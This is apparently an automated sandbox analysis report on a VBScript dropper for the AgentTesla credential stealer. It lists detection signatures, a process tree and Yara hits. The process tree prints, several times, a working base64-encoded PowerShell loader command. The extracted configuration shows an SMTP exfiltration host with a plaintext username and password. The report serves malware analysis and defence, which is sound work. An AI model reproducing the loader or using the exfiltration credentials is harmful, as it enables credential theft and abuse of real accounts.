Edit tour

Windows Analysis Report
DOCUMENTS.vbs

Overview

General Information

Sample name:	DOCUMENTS.vbs
Analysis ID:	1502680
MD5:	c7faeee6a7bee0b9c88031c74961933f
SHA1:	c830717198c406f108040200cd687e0e9f25fda2
SHA256:	f7d3563d4e1017ed2f243d4fa74e737c4db433cb6b8a78dcafa7c5cb59c76c49
Tags:	vbs
Infos:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious encrypted Powershell command line found

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected AntiVM3

.NET source code contains potential unpacker

AI detected suspicious sample

Check if machine is in data center or colocation facility

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionality to log keystrokes (.Net Source)

Creates autostart registry keys with suspicious values (likely registry only malware)

Creates processes via WMI

Injects a PE file into a foreign processes

Installs a global keyboard hook

Powershell is started from unusual location (likely to bypass HIPS)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Reads the Security eventlog

Reads the System eventlog

Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet

Sigma detected: WScript or CScript Dropper

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Very long command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Costura Assembly Loader

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Java / VBScript file with very long strings (likely obfuscated code)

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: PSScriptPolicyTest Creation By Uncommon Process

Sigma detected: PowerShell Script Run in AppData

Sigma detected: Suspicious Copy From or To System Directory

Sigma detected: Suspicious Outbound SMTP Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

wscript.exe (PID: 7636 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\DOCUMENTS.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

DOCUMENTS.vbs.exe (PID: 7804 cmdline: "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 7812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

InstallUtil.exe (PID: 8116 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cmd.exe (PID: 7712 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\Desktop\DOCUMENTS.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 6764 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

Nwjbuywyew.vbs.exe (PID: 5628 cmdline: "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 5164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

InstallUtil.exe (PID: 1568 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cmd.exe (PID: 1344 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 1152 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

cmd.exe (PID: 1196 cmdline: cmd /c copy "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" /Y MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Nwjbuywyew.vbs.exe (PID: 3276 cmdline: "C:\Users\user\AppData\Roaming\Nwjbuywyew.vbs.exe" -enc JABOAHAAZQBnAHcAYgBpAGQAaABzAGIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdABQAHIAbwBjAGUAcwBzACgAKQAuAE0AYQBpAG4ATQBvAGQAdQBsAGUALgBGAGkAbABlAE4AYQBtAGUALgBSAGUAcABsAGEAYwBlACgAJwAuAGUAeABlACcALAAnACcAKQA7ACQAVAB5AHUAbQBpAHIAbQB1AGUAeABwACAAPQAgAGcAZQB0AC0AYwBvAG4AdABlAG4AdAAgACQATgBwAGUAZwB3AGIAaQBkAGgAcwBiACAAfAAgAFMAZQBsAGUAYwB0AC0ATwBiAGoAZQBjAHQAIAAtAEwAYQBzAHQAIAAxADsAIAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAHkAdQBtAGkAcgBtAHUAZQB4AHAALgBSAGUAcABsAGEAYwBlACgAJwBSAEUATQAgACcALAAgACcAJwApAC4AUgBlAHAAbABhAGMAZQAoACcAQAAnACwAIAAnAEEAJwApACkAOwAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACAALAAgACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACAAKQA7ACQATwBzAHYAZgB6AGUAcwB5ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABDAHAAYgB5AG4AcABuAHYAawB6ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAE4AaAB5AG4AawB0AGoAcQBiAHgAegAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAQwBwAGIAeQBuAHAAbgB2AGsAegAuAEMAbwBwAHkAVABvACgAIAAkAE8AcwB2AGYAegBlAHMAeQAgACkAOwAkAEMAcABiAHkAbgBwAG4AdgBrAHoALgBDAGwAbwBzAGUAKAApADsAJABOAGgAeQBuAGsAdABqAHEAYgB4AHoALgBDAGwAbwBzAGUAKAApADsAWwBiAHkAdABlAFsAXQBdACAAJABJAGEAdwB3AHEAZgB3AG8AYgBnAG0AIAA9ACAAJABPAHMAdgBmAHoAZQBzAHkALgBUAG8AQQByAHIAYQB5ACgAKQA7AFsAQQByAHIAYQB5AF0AOgA6AFIAZQB2AGUAcgBzAGUAKAAkAEkAYQB3AHcAcQBmAHcAbwBiAGcAbQApADsAIAAkAFQAcQBvAGgAbwBqAHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoARwBlAHQARABvAG0AYQBpAG4AKAApAC4ATABvAGEAZAAoACQASQBhAHcAdwBxAGYAdwBvAGIAZwBtACkAOwAgACQARABjAGIAagB3ACAAPQAgACQAVABxAG8AaABvAGoAdAAuAEUAbgB0AHIAeQBQAG8AaQBuAHQAOwAgAFsAUwB5AHMAdABlAG0ALgBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAWwBBAGMAdABpAG8AbgBdACwAIAAkAEQAYwBiAGoAdwAuAEQAZQBjAGwAYQByAGkAbgBnAFQAeQBwAGUALAAgACQARABjAGIAagB3AC4ATgBhAG0AZQApAC4ARAB5AG4AYQBtAGkAYwBJAG4AdgBvAGsAZQAoACkAIAB8ACAATwB1AHQALQBOAHUAbABsAA== MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 3280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

InstallUtil.exe (PID: 7752 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.topcats.com", "Username": "simon@topcats.com", "Password": "SpurS21?"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000015.00000002.2715317704.0000000003036000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000015.00000002.2715317704.0000000003071000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000015.00000002.2715317704.000000000304E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000012.00000002.1871888281.0000000002EBE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.1786731708.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.1786731708.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.1790656213.00000000031CE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000012.00000002.1871888281.0000000002EE1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.1826048425.00000000056E9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.1623969561.0000000008E80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.1570905081.0000000004D0B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000012.00000002.1871888281.0000000002EA6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.1916609036.000000000584C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000013.00000002.1873959182.0000000004A59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1606369547.0000000005CA6000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.1790656213.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.1790656213.00000000031A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.1890962088.00000000064DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000007.00000002.1790656213.00000000031F1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000004.00000002.1570905081.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000004.00000002.1570905081.0000000004E3A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.1826048425.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.1826048425.0000000005B3D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000013.00000002.1873959182.0000000004C76000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000013.00000002.1873959182.0000000004C76000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: DOCUMENTS.vbs.exe PID: 7804	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: DOCUMENTS.vbs.exe PID: 7804	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: DOCUMENTS.vbs.exe PID: 7804	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: DOCUMENTS.vbs.exe PID: 7804	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: DOCUMENTS.vbs.exe PID: 7804	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x3c5dc2:$b2: ::FromBase64String( 0x361b1:$s1: -join 0x15c624:$s1: -join 0x19cfc0:$s1: -join 0x1a2a19:$s1: -join 0x2eba36:$s1: -join 0x2fefee:$s1: -join 0x30c0c3:$s1: -join 0x30f495:$s1: -join 0x30fb47:$s1: -join 0x311638:$s1: -join 0x31383e:$s1: -join 0x314065:$s1: -join 0x3148d5:$s1: -join 0x315010:$s1: -join 0x315042:$s1: -join 0x31508a:$s1: -join 0x3150a9:$s1: -join 0x3158f9:$s1: -join 0x315a75:$s1: -join 0x315aed:$s1: -join
Process Memory Space: InstallUtil.exe PID: 8116	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 8116	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Nwjbuywyew.vbs.exe PID: 5628	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Nwjbuywyew.vbs.exe PID: 5628	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Nwjbuywyew.vbs.exe PID: 5628	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Nwjbuywyew.vbs.exe PID: 5628	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Nwjbuywyew.vbs.exe PID: 5628	INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC	Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution	ditekSHen	0x1ea2de:$b2: ::FromBase64String( 0x988dc:$s1: -join 0xa4ebd:$s1: -join 0x1118b4:$s1: -join 0x1387d:$s3: reverse 0x1f35e:$s3: reverse 0xe2e90:$s3: REVERSE 0xe32e5:$s3: REVERSE 0xe35e9:$s3: REVERSE 0xe39b3:$s3: REVERSE 0xe3a19:$s3: REVERSE 0xe4d9b:$s3: Reverse 0xe7cba:$s3: REVERSE 0xe80eb:$s3: REVERSE 0xe83d7:$s3: REVERSE 0xe877d:$s3: REVERSE 0xe87e1:$s3: REVERSE 0xe9a6a:$s3: Reverse 0xefd6f:$s3: REVERSE 0xf01a0:$s3: REVERSE 0xf048c:$s3: REVERSE
Process Memory Space: InstallUtil.exe PID: 1568	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: InstallUtil.exe PID: 1568	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: Nwjbuywyew.vbs.exe PID: 3276	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: Nwjbuywyew.vbs.exe PID: 3276	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: Nwjbuywyew.vbs.exe PID: 3276	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Nwjbuywyew.vbs.exe PID: 3276	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
